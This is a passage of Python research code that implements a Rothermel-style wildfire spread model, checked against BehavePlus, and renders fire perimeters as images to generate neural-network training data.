y = windRate * np.sin(windDirRadians)
rateVector = ((x**2)+(y**2))**0.5
forwardSpreadRate = Rstar + rateVector
azimuth = np.arctan2(y,x) * 180.0 / 3.1415926535
if azimuth < -1.0e-20:
azimuth = azimuth + 360
azimuth = azimuth + aspect + 180.0
if azimuth >= 360.0:
azimuth = azimuth - 360.0
return azimuth, forwardSpreadRate
def calculateWindSpeedLimit(reactionIntensity,phiS):
windSpeedLimit = 0.9 * reactionIntensity
if phiS > 0.0:
if phiS > windSpeedLimit:
phiS = windSpeedLimit
return windSpeedLimit
def calculateEffectiveWindSpeed(forwardSpreadRate,Rstar,relativePackingRatio,sigma,windSpeedLimit=9001):
windC, windB, windE = getWindIntermediates(sigma)
phiEffectiveWind = forwardSpreadRate/Rstar - 1.0
effectiveWindSpeed = ((phiEffectiveWind*(relativePackingRatio**windE)) / windC)**(1/windB)
effectiveWindSpeed = effectiveWindSpeed / 88
if effectiveWindSpeed > windSpeedLimit/88:
effectiveWindSpeed = windSpeedLimit/88
return effectiveWindSpeed
def getResidenceTime(sigma):
if sigma < 1.0e-7:
residenceTime = 0.0
else:
residenceTime = 384.0/sigma
return residenceTime
def calculateFireBasicDimensions(effectiveWindSpeed,forwardSpreadRate):
#print("***EFF,",effectiveWindSpeed)#*88/60)
if effectiveWindSpeed > 1.0e-7:
fireLengthToWidthRatio = 1.0 + (0.25 * effectiveWindSpeed)#*88/60)
else:
fireLengthToWidthRatio = 1.0
#print("default fl2wr:",fireLengthToWidthRatio)
#print("default ecc:",(1-(1/fireLengthToWidthRatio)**2)**0.5)
#fireLengthToWidthRatio = 1.174
#fireLengthToWidthRatio = 2.25
#fireLengthToWidthRatio = 1.174 # with effective wind speed 15.7 mi/h
#fireLengthToWidthRatio = 1.161 # with effective wind speed 8.5 mi/h
#fireLengthToWidthRatio = 1.145 # with effective wind speed 5.0 mi/h
x = (fireLengthToWidthRatio**2) - 1.0
if x > 0.0:
eccentricity = (x**0.5) / fireLengthToWidthRatio
#eccentricity = (1-(1/fireLengthToWidthRatio)**2)**0.5
else:
eccentricity = 0.0
#eccentricity = 0.9045
#print("modded fl2wr:",fireLengthToWidthRatio)
#print("modded ecc:",eccentricity)
backingSpreadRate = forwardSpreadRate * (1.0-eccentricity) / (1.0+eccentricity)
ellipticalB = (forwardSpreadRate + backingSpreadRate) / 2.0
ellipticalC = ellipticalB - backingSpreadRate
if fireLengthToWidthRatio > 1e-7:
ellipticalA = ellipticalB / fireLengthToWidthRatio
else:
ellipticalA = 0.0
return fireLengthToWidthRatio, eccentricity, backingSpreadRate, ellipticalA, ellipticalB, ellipticalC
def calculateFireFirelineIntensity(forwardSpreadRate,reactionIntensity,residenceTime):
firelineIntensity = forwardSpreadRate * reactionIntensity * residenceTime / 60.0
return firelineIntensity
def calculateFlameLength(firelineIntensity):
flameLength = max([0.0,0.45*(firelineIntensity**0.46)])
return flameLength
def calculateSpreadRateAtVector(forwardSpreadRate,eccentricity,dirRmax,dirOfInterest):
if forwardSpreadRate > 0.0:
beta = abs(dirRmax - dirOfInterest)
#print("%.1f,%.1f,%.1f"%(dirRmax,dirOfInterest,beta))
if beta > 180.0:
beta = (360-beta)
betaRad = beta * 3.1415926535/180.0
dirFactor = ((np.cos(betaRad)+1)/2)
# This is the equation according to the BehavePlus source code:
rosVector = forwardSpreadRate * (1.0-eccentricity) / (1.0-eccentricity* np.cos(betaRad))
# This is the equaiton I have found to match BehavePlus results:
rosVector = ((1-abs(betaRad)/3.1415926535)*forwardSpreadRate * dirFactor)
# Combining the two smooths out the peak
rosVector = ((1-abs(betaRad)/3.1415926535)*forwardSpreadRate * dirFactor + (abs(betaRad)/3.1415926535)*rosVector)
#eccentricity = 0.9
#rosVector = forwardSpreadRate * (1.0-eccentricity) / (1.0-eccentricity*dirFactor)
#if beta < 30:
#rosVector = ((1-abs(betaRad)/3.1415926535)*forwardSpreadRate * dirFactor + (betaRad/3.1415926535)*rosVector)
#print(dirOfInterest,betaRad,rosVector)
else:
rosVector = 0.0
return rosVector
def calculateSpreadRateAtVector2(forwardSpreadRate,backSpreadRate,eccentricity,dirRmax,dirOfInterest):
if forwardSpreadRate > 0.0:
beta = abs(dirRmax - dirOfInterest)
#print("%.1f,%.1f,%.1f"%(dirRmax,dirOfInterest,beta))
if beta > 180.0:
beta = (360-beta)
if abs(beta) > 0.1:
betaRad = beta * 3.1415926535/180.0
dirFactor = ((np.cos(betaRad)+1)/2)
# This is the equation according to the BehavePlus source code:
rosVector = forwardSpreadRate * (1.0-eccentricity) / (1.0-eccentricity* np.cos(betaRad))
# This is the equaiton I have found to match BehavePlus results:
#rosVector = ((1-abs(betaRad)/3.1415926535)*forwardSpreadRate * dirFactor)
#rosVector = ((1-abs(betaRad)/3.1415926535)*(forwardSpreadRate-backSpreadRate) * dirFactor)+backSpreadRate
# Combining the two smooths out the peak
#rosVector = ((1-abs(betaRad)/3.1415926535)*forwardSpreadRate * dirFactor + (abs(betaRad)/3.1415926535)*rosVector)
#eccentricity = 0.9
#rosVector = forwardSpreadRate * (1.0-eccentricity) / (1.0-eccentricity*dirFactor)
#if beta < 30:
#rosVector = ((1-abs(betaRad)/3.1415926535)*forwardSpreadRate * dirFactor + (betaRad/3.1415926535)*rosVector)
#print(dirOfInterest,betaRad,rosVector)
else:
rosVector = forwardSpreadRate
if rosVector < backSpreadRate:
rosVector = backSpreadRate
else:
rosVector = 0.0
return rosVector
def scaleRandomValue(mn,mx):
value = np.random.random()*(mx-mn)+mn
return value
def getRandomConditions(params,allowDynamicModels=True):
paramsRand = dict()
for key in params.keys():
if params[key][0] == None:
minValue = params[key][1]
maxValue = params[key][2]
if key == 'model':
fuelModels = list(buildFuelModels(allowDynamicModels=minValue,allowNonBurningModels=maxValue).keys())
value = fuelModels[np.random.randint(0,len(fuelModels))]
else:
value = scaleRandomValue(minValue,maxValue)
else:
value = params[key][0]
paramsRand[key] = value
return paramsRand
def orderParams(params,toPrint=False):
model = params['model']
canopyCover = params['canopyCover']*100
canopyHeight = params['canopyHeight']
crownRatio = params['crownRatio']
m1h = params['m1h']
m10h = params['m10h']
m100h = params['m100h']
lhm = params['lhm']
lwm = params['lwm']
windSpeed = params['windSpeed']
windDir = params['windDir']
slope = params['slope']*100
aspect = params['aspect']
orderedParams = [model,canopyCover,canopyHeight,crownRatio,m1h,m10h,m100h,lhm,lwm,windSpeed,windDir,slope,aspect]
if toPrint:
print("************************************************************")
print("Starting simulation")
print("model:\t\t\t%s"%(model))
print("canopyCover:\t\t%.2f"%(canopyCover))
print("canopyHeight:\t\t%.2f"%(canopyHeight))
print("crownRatio:\t\t%.2f"%(crownRatio))
print("m1h:\t\t\t%.2f"%(m1h))
print("m10h:\t\t\t%.2f"%(m10h))
print("m100h:\t\t\t%.2f"%(m100h))
print("lhm:\t\t\t%.2f"%(lhm))
print("lwm:\t\t\t%.2f"%(lwm))
print("windSpeed:\t\t%.2f"%(windSpeed))
print("windDir:\t\t%.2f"%(windDir))
print("slope:\t\t\t%.2f"%(slope))
print("aspect:\t\t\t%.2f"%(aspect))
return orderedParams
def getROSfromParams(params,toPrint=False,maxOnly=False):
model = params['model']
canopyCover = params['canopyCover']
canopyHeight = params['canopyHeight']
crownRatio = params['crownRatio']
m1h = params['m1h']
m10h = params['m10h']
m100h = params['m100h']
lhm = params['lhm']
lwm = params['lwm']
windSpeed = params['windSpeed']
windDir = params['windDir']
slope = params['slope']
aspect = params['aspect']
orderParams(params,toPrint=toPrint)
directions = np.linspace(0,360,361)
fuelModel = getFuelModel(model)
moistureDead, moistureLive = getMoistureContent(m1h,m10h,m100h,lhm,lwm)
loadDead, loadLive = getFuelLoad(fuelModel,moistureLive)
savrDead, savrLive = getSAV(fuelModel)
deadFraction, liveFraction, deadFractionTotal, liveFractionTotal = getDLFraction(fuelModel,moistureLive)
if toPrint:
print(deadFraction)
print(liveFraction)
moistOfExtDead, moistOfExtLive = getMoistOfExt(fuelModel,moistureDead,moistureLive)
heatDead, heatLive = getHeatOfCombustion(fuelModel)
intermediates = lifeStateIntermediate(fuelModel,moistureDead,moistureLive)
sigma = getCharacteristicSAVR(fuelModel,intermediates,moistureLive)
packingRatio, relativePackingRatio, bulkDensity = getPackingRatios(fuelModel,intermediates,moistureLive)
heatSink = getHeatSink(fuelModel,moistureDead,moistureLive,bulkDensity)
heatFlux = getHeatFlux(fuelModel,moistureDead,moistureLive,sigma,packingRatio)
reactionIntensity, reactionIntensityDead, reactionIntensityLive = getSurfaceFireReactionIntensity(fuelModel,sigma,relativePackingRatio,moistOfExtDead,moistOfExtLive,intermediates)
Rstar = getNoWindNoSlopeSpreadRate(reactionIntensity,heatFlux,heatSink)
mfWindSpeed, waf = calculateMidflameWindSpeed(fuelModel,windSpeed,canopyCover,canopyHeight,crownRatio)
phiW = calculateWindFactor(sigma,relativePackingRatio,mfWindSpeed)
phiS = calculateSlopeFactor(slope,packingRatio)
dirRmax, forwardSpreadRate = calculateDirectionOfMaxSpread(windDir,aspect,Rstar,phiS,phiW)
windSpeedLimit = calculateWindSpeedLimit(reactionIntensity,phiS)
effectiveWindSpeed = calculateEffectiveWindSpeed(forwardSpreadRate,Rstar,relativePackingRatio,sigma,windSpeedLimit=windSpeedLimit)
residenceTime = getResidenceTime(sigma)
#effectiveWindSpeed = 3.9
fireLengthToWidthRatio, eccentricity, backingSpreadRate, eA, eB, eC = calculateFireBasicDimensions(effectiveWindSpeed,forwardSpreadRate)
firelineIntensity = calculateFireFirelineIntensity(forwardSpreadRate,reactionIntensity,residenceTime)
flameLength = calculateFlameLength(firelineIntensity)
rosVectors = []
R = calculateSpreadRateAtVector(forwardSpreadRate,eccentricity,dirRmax,dirRmax)
R = convertFtMinToChHr(R)
if toPrint:
print("************************************************************")
print("Rate of Spread:\t\t\t\t\t%.1f\tch/h"%(R))
print("Reaction Intensity:\t\t\t\t%.0f\tBtu/ft2/min"%(reactionIntensity))
print("Surface Fire Dir of Max Spread (from north):\t%.0f\tdeg"%(dirRmax))
print("Midflame Wind Speed:\t\t\t\t%.1f\tmi/h"%(mfWindSpeed))
print("Wind Adjustment Factor:\t\t\t\t%.2f"%(waf))
print("Effective Wind Speed:\t\t\t\t%.1f\tmi/h"%(effectiveWindSpeed))
print("Live Fuel Moisture of Extinction:\t\t%.0f"%(moistOfExtLive*100))
print("Characteristic SA/V:\t\t\t\t%s\tft2/ft3"%(int(sigma)))
print("Bulk Density:\t\t\t\t\t%.4f\tlbs/ft3"%(bulkDensity))
print("Packing Ratio:\t\t\t\t\t%.4f"%(packingRatio))
print("Relative Packing Ratio:\t\t\t\t%.4f"%(relativePackingRatio))
print("Dead Fuel Reaction Intensity:\t\t\t%.0f\tBtu/ft2/min"%(reactionIntensityDead))
print("Live Fuel Reaction Intensity:\t\t\t%.0f\tBtu/ft2/min"%(reactionIntensityLive))
print("Surface Fire Wind Factor:\t\t\t%.1f"%(phiW))
print("Slope Factor:\t\t\t\t\t%.1f"%(phiS))
print("Heat Source:\t\t\t\t\t%.0f\tBtu/ft2/min"%(heatFlux*reactionIntensity*(1+phiS+phiW)))
print("Heat Sink:\t\t\t\t\t%.1f\tBtu/ft3"%(heatSink))
print("Dead Herbaceous Fuel Load:\t\t\t%.2f\tton/ac"%(loadDead[3]*21.78))
print("Live Fuel Load Remainder:\t\t\t%.2f\tton/ac"%(loadLive[0]*21.78))
print("Total Dead Fuel Load:\t\t\t\t%.2f\tton/ac"%(np.sum(loadDead)*21.78))
print("Total Live Fuel Load:\t\t\t\t%.2f\tton/ac"%(np.sum(loadLive)*21.78))
print("Dead Fuel Load Portion:\t\t\t\t%.2f"%(np.sum(loadDead)/(np.sum(loadDead)+np.sum(loadLive))*100))
print("Live Fuel Load Portion:\t\t\t\t%.2f"%(np.sum(loadLive)/(np.sum(loadDead)+np.sum(loadLive))*100))
print("************************************************************")
if maxOnly:
return dirRmax, R
for dirOfInterest in directions:
rosVector = calculateSpreadRateAtVector2(forwardSpreadRate,backingSpreadRate,eccentricity,dirRmax,dirOfInterest)
rosVector = convertFtMinToChHr(rosVector)
rosVectors.append(rosVector)
rosVectors = np.array(rosVectors)
#R = calculateROS(Rstar, phiW, phiS)
return directions, rosVectors
def cartCoords(thetaRad,rosVectorsKmHr):
coords = np.zeros((len(rosVectorsKmHr),2))
x = -1*np.array(rosVectorsKmHr)*np.sin(thetaRad)
y = -1*np.array(rosVectorsKmHr)*np.cos(thetaRad)
coords[:,0] = x
coords[:,1] = y
return coords
def rothermelOuputToImg(theta,R,resX=50,resY=50):
coords = cartCoords(theta,R.copy())
(coords[:,0],coords[:,1]) = (coords[:,0]+resX/2,coords[:,1]+resY/2)
coords = np.array(coords,dtype=np.int32)
coordsTuple = []
for c in coords:
coordsTuple.append((c[0],c[1]))
img = Image.new('LA',(resX,resY))
draw = ImageDraw.Draw(img)
draw.polygon(coordsTuple,fill='black',outline=None)
img = np.copy(np.asarray(img)[:,:,1])
#img[int(resX/2),int(resY/2)] = 125
return img
def rothermelOuputToImgMulti(theta,Rbase,times,resX=50,resY=50):
img = Image.new('LA',(resX,resY))
draw = ImageDraw.Draw(img)
for t in times:
coords = cartCoords(theta,Rbase.copy()*t)
(coords[:,0],coords[:,1]) = (coords[:,0]+resX/2,coords[:,1]+resY/2)
coords = np.array(coords,dtype=np.int32)
coordsTuple = []
for c in coords:
coordsTuple.append((c[0],c[1]))
draw.polygon(coordsTuple,fill=(t,t),outline=(t,t))
img = np.copy(np.asarray(img)[:,:,1])
#img[int(resX/2),int(resY/2)] = 125
return img
def convertChHrToKmHour(R):
if R is list:
for r in R:
r = r*(1.1)*(60.0/5280.0)*(1.60934)
else:
R = R*1.1 # Convert to ft/min
R = R*60.0/5280.0 # Convert to mi/hour
R = R*1.60934 # Convert to km/hour
return R
def convertDegToRad(theta):
if theta is list:
for r in theta:
r = r*3.1415926535/180.0
else:
theta = theta*3.1415926535/180.0
return theta
def slopeToElevImg(phi,phiDir,resX=50,resY=50):
phiDirRad = phiDir*3.1415926535/180.0
slopeX = phi*np.sin(phiDirRad)
slopeY = -phi*np.cos(phiDirRad)
img = np.zeros((2,2))
#img[img == 0] = np.nan
img[0,0] = -resX/2*slopeX+resY/2*slopeY
img[0,-1]= resX/2*slopeX+resY/2*slopeY
img[-1,0] = -resX/2*slopeX-resY/2*slopeY
img[-1,-1] = resX/2*slopeX-resY/2*slopeY
img = zoom(img,resX/2,order=1)
return img
def visualizeInputImgs(directions,rosVectors,params,resX=50,resY=50,toPlot=True):
rosVectorsKmHr = convertChHrToKmHour(rosVectors)
directionsRad = convertDegToRad(directions)
x = -1*np.array(rosVectorsKmHr)*np.sin(directionsRad)
y = np.array(rosVectorsKmHr)*np.cos(directionsRad)
img6 = rothermelOuputToImg(directionsRad,rosVectorsKmHr*6.0,resX=resX,resY=resY)
img12 = rothermelOuputToImg(directionsRad,rosVectorsKmHr*12.0,resX=resX,resY=resY)
img18 = rothermelOuputToImg(directionsRad,rosVectorsKmHr*18.0,resX=resX,resY=resY)
img24 = rothermelOuputToImg(directionsRad,rosVectorsKmHr*24.0,resX=resX,resY=resY)
elevImg = slopeToElevImg(params['slope'],params['aspect'],resX=resX,resY=resY)
windDirRad = params['windDir']*3.1415926536/180.0
windX = np.zeros((resX,resY))+params['windSpeed']*np.sin(windDirRad)
windY = np.zeros((resX,resY))-params['windSpeed']*np.cos(windDirRad)
lhmImg = np.zeros((resX,resY))+params['lhm']
lwmImg = np.zeros((resX,resY))+params['lwm']
m1hImg = np.zeros((resX,resY))+params['m1h']
m10hImg = np.zeros((resX,resY))+params['m10h']
m100hImg = np.zeros((resX,resY))+params['m100h']
canopyCoverImg = np.zeros((resX,resY))+params['canopyCover']
canopyHeightImg = np.zeros((resX,resY))+params['canopyHeight']
crownRatioImg = np.zeros((resX,resY))+params['crownRatio']
modelImg = np.zeros((resX,resY))+params['modelInd']
fireImages = [img6,img12,img18,img24]
modelInputs = [elevImg,windX,windY,lhmImg,lwmImg,m1hImg,m10hImg,m100hImg,canopyCoverImg,canopyHeightImg,crownRatioImg,modelImg]
if toPlot:
plt.figure(figsize=(12,12))
plt.suptitle('Fuel Model:%s'%(params['model']))
plt.subplot(4,4,1)
plt.imshow(img12,cmap='jet')
plt.colorbar()
plt.title('Fire at 12 hours')
plt.subplot(4,4,2)
plt.imshow(img24,cmap='jet')
plt.colorbar()
plt.title('Fire at 24 hours')
plt.subplot(4,4,3)
plt.imshow(elevImg,cmap='jet')
plt.colorbar()
plt.title('Elevation')
plt.subplot(4,4,4)
plt.imshow(windX,cmap='jet',vmin=-20,vmax=20)
plt.colorbar()
plt.title('WindX')
plt.subplot(4,4,5)
plt.imshow(windY,cmap='jet',vmin=-20,vmax=20)
plt.colorbar()
plt.title('WindY')
plt.subplot(4,4,6)
plt.imshow(lhmImg,cmap='jet',vmin=30,vmax=150)
plt.colorbar()
plt.title('Live Herbaceous Moisture')
plt.subplot(4,4,7)
plt.imshow(lwmImg,cmap='jet',vmin=30,vmax=150)
plt.colorbar()
plt.title('Live Woody Moisture')
plt.subplot(4,4,8)
plt.imshow(m1hImg,cmap='jet',vmin=0,vmax=40)
plt.colorbar()
plt.title('1-hour Moisture')
plt.subplot(4,4,9)
plt.imshow(canopyCoverImg,cmap='jet',vmin=0,vmax=1)
plt.colorbar()
plt.title('Canopy Cover')
plt.subplot(4,4,10)
plt.imshow(canopyHeightImg,cmap='jet',vmin=1,vmax=20)
plt.colorbar()
plt.title('Canopy Height')
plt.subplot(4,4,11)
plt.imshow(crownRatioImg,cmap='jet',vmin=0,vmax=1)
plt.colorbar()
plt.title('Crown Ratio')
plt.subplot(4,4,12)
plt.imshow(modelImg,cmap='jet',vmin=0,vmax=52)
plt.colorbar()
plt.title('Model')
#plt.plot(x,y)
#plt.plot(0,0,'ok')
#xRange = x.max()-x.min()
#yRange = y.max()-y.min()
#plt.xlim([x.min()-xRange/2,x.max()+xRange/2])
#plt.ylim([y.min()-yRange/2,y.max()+yRange/2])
#plt.title('Rate of Spread')
return fireImages, modelInputs
def visualizeInputValues(directions,rosVectors,params,resX=50,resY=50):
rosVectorsKmHr = convertChHrToKmHour(rosVectors)
directionsRad = convertDegToRad(directions)
x = -1*np.array(rosVectorsKmHr)*np.sin(directionsRad)
y = np.array(rosVectorsKmHr)*np.cos(directionsRad)
imgFire = rothermelOuputToImgMulti(directionsRad,rosVectorsKmHr,[48,42,36,30,24,18,12,6],resX=resX,resY=resY)
imgFire[25,25] = 0
elevImg = slopeToElevImg(params['slope'],params['aspect'],resX=resX,resY=resY)
windDirRad = params['windDir']*3.1415926536/180.0
windSpeed = params['windSpeed']
windX = 1.0*windSpeed*np.sin(windDirRad)
windY = -1.0*windSpeed*np.cos(windDirRad)
windYs = [windX,windY]
windXs = np.arange(len(windYs))
windNames = ('E+','N+')
windLimits = [-20,20]
moistYs = [params['m1h'],params['m10h'],params['m100h'],params['lhm']/5,params['lwm']/5]
moistXs = np.arange(len(moistYs))
moistNames = ('m1h','m10h','m100h','lhm/5','lwm/5')
moistLimits = [0,60]
canopyYs = [params['canopyCover'],params['canopyHeight']/20,params['crownRatio']]
canopyXs = np.arange(len(canopyYs))
canopyNames = ('Cover (%)','Height (ft/20)','Ratio (%)')
canopyLimits = [0,1]
modelYs = [params['modelInd'],0]
modelXs = np.arange(len(modelYs))
modelNames = (str(params['model']),'')
modelLimits = [0,52]
plt.figure(figsize=(10,14))
plt.suptitle('Fuel Model:%s'%(params['model']))
plt.subplot(3,2,1)
plt.imshow(imgFire,cmap='gray_r')
c = plt.colorbar(ticks=[48,36,24,12,0])
plt.title('Fire spread')
plt.xlabel('km')
plt.ylabel('km')
c.ax.set_label('Hours')
#plt.subplot(3,3,2)
#plt.imshow(img24,cmap='jet')
#plt.colorbar()
#plt.title('Fire at 24 hours')
plt.subplot(3,2,3)
plt.imshow(elevImg,cmap='jet')
plt.colorbar()
plt.title('Elevation Difference [km]')
plt.subplot(3,2,4)
plt.bar(windXs,windYs,align='center');
plt.xticks(windXs,windNames);
plt.ylabel('WindSpeed (mph)');
plt.ylim(windLimits)
plt.subplot(3,2,5)
plt.bar(moistXs,moistYs,align='center');
plt.xticks(moistXs,moistNames);
plt.ylabel('Moisture (%)');
plt.ylim(moistLimits)
plt.subplot(3,2,6)
plt.bar(canopyXs,canopyYs,align='center');
plt.xticks(canopyXs,canopyNames);
plt.ylabel('Canopy (%)');
plt.ylim(canopyLimits)
plt.subplot(3,2,2)
plt.bar(modelXs,modelYs,align='center');
plt.xticks(modelXs,modelNames);
plt.ylabel('Model Rank');
plt.ylim(modelLimits)
plt.xlim([-0.95,0.95])
#plt.plot(x,y)
#plt.plot(0,0,'ok')
#xRange = x.max()-x.min()
#yRange = y.max()-y.min()
#plt.xlim([x.min()-xRange/2,x.max()+xRange/2])
#plt.ylim([y.min()-yRange/2,y.max()+yRange/2])
#plt.title('Rate of Spread')
return imgFire
def paramListTodict(paramsRaw):
params = dict()
params['model'] = paramsRaw[0]
params['canopyCover'] = float(paramsRaw[1])/100
params['canopyHeight'] = float(paramsRaw[2])
params['crownRatio'] = float(paramsRaw[3])
params['m1h'] = float(paramsRaw[4])
params['m10h'] = float(paramsRaw[5])
params['m100h'] = float(paramsRaw[6])
params['lhm'] = float(paramsRaw[7])
params['lwm'] = float(paramsRaw[8])
params['windSpeed'] = float(paramsRaw[9])
params['windDir'] = float(paramsRaw[10])
params['slope'] = float(paramsRaw[11])/100
params['aspect'] = float(paramsRaw[12])
return params
def getStandardParams():
# model,canopyCover/100,Height,Ratio,m1h,m10h,m100h,lhm,l2m,windSpeed,windDir,slope,aspect
#paramList = ['FM1',0,0,0.5,8,6,4,60,60,10,0,0.5,0]
paramList = ['FM1',0,0,0.5,8,9,10,60,60,10,0,0.5,0]
params = paramListTodict(paramList)
return params
def determineFastestModel(params=None,toPrint=False):
if params is None:
params = getStandardParams()
fuelModels = buildFuelModels(allowDynamicModels=True,allowNonBurningModels=True)
updatedModels = []
Rs = []
for fuelModel in list(fuelModels.keys()):
params['model'] = fuelModel
direction, R = getROSfromParams(params,maxOnly=True)
updatedModels.append(fuelModel)
Rs.append(R)
numZero = len(np.where(np.array(Rs) <= 0.01)[0])
inds = np.argsort(Rs)
updatedModelsSort = np.array(updatedModels)[inds]
RsSort = np.sort(Rs)
modelIndexDict = dict()
for i in range(0,len(inds)):
value = max(0,i-numZero+1)
modelIndexDict[updatedModelsSort[i]] = value
if toPrint:
print("Model = %s,\tR = %.2f"%(updatedModelsSort[i],RsSort[i]))
return modelIndexDict
def rearrangeDatas(datas):
sz = datas[0].shape
szrs = sz[0]*sz[1]
datasNew = np.zeros((szrs*len(datas),))
for i in range(0,len(datas)):
datasNew[i*szrs:(i+1)*szrs] = np.reshape(datas[i],(szrs,))
return datasNew
def getStandardParamsInput():
paramsInput = dict()
paramsInput['model'] = [None,True,False] # string
paramsInput['canopyCover'] = [None,0.0,1.0] # percent (0-1)
paramsInput['canopyHeight'] = [None,1.0,20.0] # ft (1-20)
paramsInput['crownRatio'] = [None,0.1,1.0] # fraction (0.1-1)
paramsInput['m1h'] = [None,1.0,40.0] # percent (1-60)
paramsInput['m10h'] = [None,1.0,40.0] # percent (1-60)
paramsInput['m100h'] = [None,1.0,40.0] # percent (1-60)
paramsInput['lhm'] = [None,30.0,100.0] # percent (30-300)
paramsInput['lwm'] = [None,30.0,100.0] # percent (30-300)
paramsInput['windSpeed'] = [None,0.0,30.0] # mph (0-30)
paramsInput['windDir'] = [None,0.0,360.0] # degrees (0-360)
paramsInput['slope'] = [None,0.0,1.0] # fraction (0-1)
paramsInput['aspect'] = [None,0.0,360.0] # degrees (0-360)
paramsInput['Mth'] = [None,5,9] # integer
paramsInput['Day'] = [None,0,31] # integer
paramsInput['Pcp'] = [None,0.3,10.9] # mm
paramsInput['mTH'] = [None,400,600] # 24-Hour
paramsInput['xTH'] = [None,1200,1500] # 24-Hour
paramsInput['mT'] = [None,2.0,16.6] # degrees C
paramsInput['xT'] = [None,28.9,37.2] # degrees C
paramsInput['mH'] = [None,39.2,50.0] # Percent
paramsInput['xH'] = [None,39.2,50.0] # Percent
paramsInput['PST'] = [None,0,2400] # Precipitation Start Time
paramsInput['PET'] = [None,0,2400] # Precipitation End Time
paramsInput['startTime'] = [None,0,24] # Fire start hour
return paramsInput
def manyFiresInputFigure(modelInputs):
fig, ax = plt.subplots(figsize=(8,8))
a = []
lims = [[-30,30],[-20,20],[-20,20],[30,150],[30,150],[0,30],[0,30],[0,30],[0,1],[0,20],[0,1],[0,53]]
names = ['Elevation','East Wind','North Wind','Live Herbaceous Moisture','Live Woody Moisture','1-Hour Moisture','10-Hour Moisture','100-Hour Moisture','Canopy Cover','Canopy Height','Crown Ratio','Fuel Model']
textOffset = [0]
#modelInputs = [elevImg,windX,windY,lhmImg,lwmImg,m1hImg,m10hImg,m100hImg,canopyCoverImg,canopyHeightImg,crownRatioImg,modelImg]
for i in range(len(modelInputs)-1,-1,-1):
img = modelInputs[i].copy()
img[-1,-1] = lims[i][0]
img[-1,-2] = lims[i][1]
oi = OffsetImage(img, zoom = 2.0, cmap='jet')
box = AnnotationBbox(oi, (-0.5*i,1*i), frameon=True)
a.append(ax.add_artist(box))
ax.annotate(names[i],xy=(-0.5*i-1.1,1*i-0.9),xycoords='data',textcoords='data',xytext=(-0.5*i-4-(len(names[i])-10)*0.1,1*i-0.85),arrowprops=dict(facecolor='black',shrink=0.05))
i = -1
oi = OffsetImage(imgFire, zoom = 2.0, cmap='jet')
box = AnnotationBbox(oi, (-0.5*i,1*i), frameon=True)
ax.annotate('Fire Perimiter',xy=(-0.5*i-1.1,1*i-0.9),xycoords='data',textcoords='data',xytext=(-0.5*i-4,1*i-0.85),arrowprops=dict(facecolor='black',shrink=0.05))
a.append(ax.add_artist(box))
plt.xlim(-2,6.15)
plt.ylim(-1.9,12.2)
plt.xlim(-9.0,1.4)
#plt.ylim(-50,50)
plt.axis('off')
plt.tight_layout()
plt.savefig('..%soutputs%sinputsExampleManyFires.png'%(os.sep, os.sep),dpi=300)
def makeFirePerimetersFigure(imgFire):
import skimage.transform as sktf
import skimage.filters as skfi
from mpl_toolkits.axes_grid1 import make_axes_locatable
oi = skfi.gaussian(imgFire,sigma=1.0,preserve_range=True)
imgFire = visualizeInputValues(directions,rosVectors,params,resX=250,resY=250)
imgFire[125:126,125:126] = 0
imgFire = imgFire[25:175,100:]
imgFire = imgFire[::-1,:]
#oi = OffsetImage(imgFire, zoom = 2.0, cmap='jet')
plt.figure(figsize=(12,12))
ax = plt.gca()
fs=32
im = ax.imshow(imgFire,cmap='hot_r')
plt.gca().invert_yaxis()
plt.xlabel('km',fontsize=fs)
plt.ylabel('km',fontsize=fs)
plt.tick_params(labelsize=fs)
plt.xticks([0,20,40,60,80,100,120,140])
plt.yticks([0,20,40,60,80,100,120,140])
divider = make_axes_locatable(ax)
cax = divider.append_axes("right",size="5%", pad=0.05)
c = plt.colorbar(im,ticks=[48,36,24,12,0],cax=cax)
#plt.title('Fire spread')
plt.tick_params(labelsize=fs)
plt.ylabel('Hours',fontsize=fs)
#c.ax.set_label(fontsize=fs)
plt.tight_layout()
plt.savefig('..%soutputs%sexampleFirePerimiter.eps'%(os.sep, os.sep))
if __name__ == "__main__":
''' case0: Generate 1 set of random inputs and visualize the results.
case1: Generate set of 100 random inputs and save inputs for validation
with behavePlus.
case2: Re-generate prediction with same random inputs.
case3: Re-generate single validation output.
case4: Generate validation plots.
case5: Generate neural network dataset
'''
case = 5
paramsInput = dict()
paramsInput['model'] = [None,True,False] # string
paramsInput['canopyCover'] = [None,0.0,1.0] # percent (0-1)
paramsInput['canopyHeight'] = [None,1.0,20.0] # ft (1-20)
paramsInput['crownRatio'] = [None,0.1,1.0] # fraction (0.1-1)
paramsInput['m1h'] = [None,1.0,40.0] # percent (1-60)
paramsInput['m10h'] = [None,1.0,40.0] # percent (1-60)
paramsInput['m100h'] = [None,1.0,40.0] # percent (1-60)
paramsInput['lhm'] = [None,30.0,100.0] # percent (30-300)
paramsInput['lwm'] = [None,30.0,100.0] # percent (30-300)
paramsInput['windSpeed'] = [None,0.0,30.0] # mph (0-30)
paramsInput['windDir'] = [None,0.0,360.0] # degrees (0-360)
paramsInput['slope'] = [None,0.0,1.0] # fraction (0-1)
paramsInput['aspect'] = [None,0.0,360.0] # degrees (0-360)
paramsInput['Tmin'] = [None,2.0,16.6] # degrees C
paramsInput['Tmax'] = [None,28.9,37.2] # degrees C
resX = 50
resY = 50
"""
"""
#params['m1h'] = 40.0
#params['windSpeed'] = 0.0 # mph (0-30)
#params['windDir'] = -135.0 # degrees (0-360)
#params['slope'] = 0.0 # fraction (0-1)
#params['aspect'] = 135
if case == 0:
params = getRandomConditions(paramsInput,allowDynamicModels=True)
params['model'] = 'TU2'
params['canopyCover'] = 0.0607 # percent (0-1)
params['canopyHeight'] = 17.46 # ft (1-20)
params['crownRatio'] = 0.99 # fraction (0-1)
params['m1h'] = 8.4 # percent (1-100)
params['m10h'] = 6 # percent (1-100)
params['m100h'] = 4 # percent (1-100)
params['lhm'] = 82.75 # percent (30-300)
params['lwm'] = 75.98 # percent (30-300)
params['windSpeed'] = 12.08 # mph (0-30)
params['windDir'] = 223.57 # degrees (0-360)
params['slope'] = 0.9942 # fraction (0-1)
params['aspect'] = 248.29 # degrees (0-360)
directions, rosVectors = getROSfromParams(params,toPrint=True)
visualizeInputImgs(directions,rosVectors,params,resX=resX,resY=resY)
visualizeInputValues(directions,rosVectors,params,resX=resX,resY=resY)
elif case == 1:
allParams = []
allDirections = []
allRosVectors = []
for i in range(0,1000):
params = getRandomConditions(paramsInput,allowDynamicModels=True)
directions, rosVectors = getROSfromParams(params)
allParams.append(orderParams(params))
